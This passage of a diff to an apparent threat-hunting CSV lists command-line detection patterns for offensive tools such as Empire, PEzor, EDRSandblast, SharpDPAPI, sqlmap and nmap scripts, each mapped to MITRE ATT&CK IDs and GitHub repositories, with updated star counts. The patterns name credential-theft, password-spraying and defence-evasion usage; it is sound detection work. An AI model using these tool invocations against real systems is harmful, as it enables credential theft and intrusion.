T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "* -unhook -antidebug * -self -sleep*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -unhook -syscalls -obfuscate *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* --unhook-method * --dont-unload-driver * --dump-output *","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"* --unhook-method * --dont-unload-driver * --dump-output *","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "* unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" -"* --union-char *GsFRts2*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --union-char *GsFRts2*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -UrbanBishop -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -UrbanBishop -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* --url * --attacker *","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "* --url --password SIMPLEPASS*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "* -urlcache */debase64/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Use-DarkHotel*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"* -user * --passwordlist *","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" -"* userenum * --dc *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -Username * -Hash * -Command *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -user * --passwordlist *","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"* userenum * --dc *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -Username * -Hash * -Command *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Username * -Password * -Command * -LogonType *","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* --UserName * --Password * --Payload *.exe*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" -"* -UserPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -UserPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --user-spns*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"* -VaultElementPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* vaults /target:* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* -VaultElementPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* vaults /target:* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* ventrilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* versant-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vmauthd-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2061,15 +2061,15 @@ "* vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -vulnerable -stdout -hide-admins*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -vulnerable -stdout -hide-admins*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -w wordlist/*.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -watson -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -w wordlist/*.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 